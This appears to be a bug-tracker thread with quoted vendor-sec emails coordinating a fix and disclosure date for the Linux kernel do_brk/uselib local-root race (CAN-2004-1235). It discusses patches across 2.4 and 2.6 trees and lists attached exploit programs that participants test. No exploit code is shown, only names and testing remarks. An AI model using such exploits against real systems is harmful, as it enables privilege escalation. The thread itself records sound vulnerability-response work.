the addition of lockless __do_brk() and locking do_brk() | > as the following patch I can prepare a v2.6 patch. | | OK... 
| | I'm a bit concerned that do_brk() is, for some reason, exported to modules. | If someone is already taking mmap_sem prior to calling do_brk(), we've | just gone and made them deadlock. | | So I think it would be better to leave do_brk unchanged and to introduce a | new do_brk_unlocked() which takes mmap_sem then calls do_brk. Agreed. OK will prepare a patch. Happy new year folks! _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Sat, 1 Jan 2005 11:18:56 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Andrew Morton <akpm@osdl.org> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org, mjc@redhat.com Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Sat, Jan 01, 2005 at 11:05:21AM -0200, Marcelo Tosatti wrote: | On Fri, Dec 31, 2004 at 02:36:27PM -0800, Andrew Morton wrote: | > Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | > > | > > Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() | > > as the following patch I can prepare a v2.6 patch. | > | > OK... | > | > I'm a bit concerned that do_brk() is, for some reason, exported to modules. | > If someone is already taking mmap_sem prior to calling do_brk(), we've | > just gone and made them deadlock. | > | > So I think it would be better to leave do_brk unchanged and to introduce a | > new do_brk_unlocked() which takes mmap_sem then calls do_brk. | | Agreed. OK will prepare a patch. | | Happy new year folks! It would be important for us to agree on a date for release of the patches, so vendors can be synchronize and prepare their udpdates. What about January 7 or 8? _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec
Created attachment 27353 [details] mail with proposed patch from marcello as attachment
ok the bug is clear now, it was do_brk and not do_mmap (I only looked at mmap last time I checked the code, and mmap was fine). I'll audit Marcelo's patch on top of our tree and I'll port to 2.6.
Judging from Marcelo's response to Andrew's comment, it's not the final patch yet.
I agree with Andrew too; I mean, I was going to audit and fix those bits (and potentially more, since I'm going to audit all do_brk callers again) and attach the result here.
Created attachment 27368 [details] do brk race fix for SLES8 from 2.4 CVS HEAD
Created attachment 27369 [details] do brk race fix for 2.6 CVS HEAD
Created attachment 27370 [details] do brk race fix for 2.6 CVS HEAD (the previous one had a leftover that I had to apply to be able to compile it)
Created attachment 27371 [details] do brk race fix for 2.6 CVS SL9.2
Created attachment 27372 [details] do brk race fix for 2.6 CVS SLES9 SP1 branch and CVS SLES9 GA branch
I didn't apply to CVS myself since I don't know the exact CVS procedures to handle security sensitive info coming from vendor-sec.
* This comment was added by mail. Date: Mon, 3 Jan 2005 18:42:26 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: vendor-sec@lst.de Cc: Andrew Morton <akpm@osdl.org>, solar@openwall.com, chrisw@osdl.org, ihaquer@isec.pl Subject: Re: [vendor-sec] Merry Christmas On Mon, Jan 03, 2005 at 02:31:50PM -0200, Marcelo Tosatti wrote: | On Mon, Jan 03, 2005 at 06:12:00PM +0100, Martin Pitt wrote: | > Hi! | > | > Marcelo Tosatti [2005-01-01 11:18 -0200]: | > > It would be important for us to agree on a date for release of the patches, | > > so vendors can synchronize and prepare their updates. | > > | > > What about January 7 or 8? | > | > Just a suggestion, maybe a release date should be set _after_ patches | > for both 2.4 and 2.6 are available? Otherwise it does not make much | > sense. | > | > Happy new year! | | Yep! I'll be sending out tested patches in a couple of hours, we can then | settle the date down, OK? Here they are - I haven't been able to run the exploit with success on v2.6.10 - it segfaults earlier than expected on mmap2 - maybe it's my compiler. Someone please test the following patch on v2.6. v2.6.10-mm1 oops on my face (during console related routines) with or without the fix. The v2.4 version has been tested with success and does stop the exploit. Kudos to Paul Starzetz for finding this!
Created attachment 27375 [details] 2.4.28-diff-brk.patch from Marcelo
Created attachment 27376 [details] 2.6.10-mm1-brk-locked.patch from Marcelo
CAN-2004-1235
can we agree on final patches already?
Created attachment 27380 [details] love_krove.gif.xx exploit program for i386 from Paul
Apparently Marcelo called it locked, while I called it _unlocked as suggested by Andrew. I trust my code more since I audited all do_brk calls, so I prefer that we apply my patches; they required rediffing due to rejects anyway. For example my 2.4 version has been written specifically for SLES8 while Marcelo's version would miss binfmt_coff.c. So Marcelo's attachment is a no-way for SUSE kernels, perhaps it could only be applied to 2.6 CVS HEAD, all other trees required re-auditing and different patches, that I already attached to this bugzilla.
Do we have final fixes here? It appears Linus did not like Marcelo's approach and wanted to do something different.
I've seen a complaint about the _locked name, but I actually called it _unlocked. The other comments about not needing the semaphore around most of them are just PR stuff, in real life this is needed and I'd be surprised if mainline won't apply all the semaphores too, to avoid possible future mistakes, like the current one in uselib(). So my patches should be ok and they'll be the only ones applying cleanly to the SUSE trees.
Ralf needs a suggestion on whether he should merge this fix into his SLES 9 SP1 update kernel. He asks us to get a consensus ;)
can someone please start applying the patches to all branches except the SLES9 - SP1 branch ...
added klaus@atsec.com,smueller@atsec.com.
Has anyone verified the exploit actually works? I cannot say whether this is a fix we absolutely must have or not, that depends on what our partners want. Ignoring this question for a moment, I'd say we _could_ ship with this fix as it's self-contained, and I trust Andrea has checked that there can't be any deadlocks with mmap_sem. Provided it's really a local root hole I think we want to have the fix in the SP1 kernel. It depends a lot on what is more disruptive to our partners - but that is Ralf's call. audit is playing games with mmap_sem in SLES8 so we need to be careful with the patch there...
Created attachment 27510 [details] elflbl_v108.c exploit with fixed /proc/slabinfo parsing for 2.6.
I have tried it, but it failed for me. However, I have only a limited set of test machines.
I can reproduce it on sles8-i386
I didn't change any API with my fix, and all those places missed the semaphore. I don't think it's risky to apply it. If you want I can make a stricter fix that only fixes up the uselib bug, but I believe the 4 patches I attached to be safer, just to be sure not to forget other semaphores elsewhere. It's just wrong not to take the semaphore even if we're single threaded. The cost of the semaphore when there cannot be any contention is not measurable.
Created attachment 27534 [details] elflbl_v108_26.c exploit that compiles on 2.6.
I have not yet succeeded in reproducing it on 2.6; however, this is mostly due to the fact that the vm_area_struct slabinfo entry does not change in the way that the exploit expects (active_objs and num_objs stay at the same value after the exploit begins). However, since the code is very similar to 2.4, it should be considered exploitable.
I'm going to apply Andrea's patches to all trees now, so we have something for check in. It can be disabled at any time if somebody is scared...
Ok, fixes have been applied to all trees now. Should I submit kernels into autobuild? Ralf, what about SP1? Since we still have a blocker there, we should fix the sec problem as well IMHO.
Assigning back to meissner to contact me to discuss it.
Ok, we discussed it and I ack it for the SP1 branch.
fixes now released for all release branches.
Created attachment 33137 [details] pwned.c public exploit (download from packetstorm security)
CVE-2004-1235: CVSS v2 Base Score: 6.2 (AV:L/AC:H/Au:N/C:C/I:C/A:C)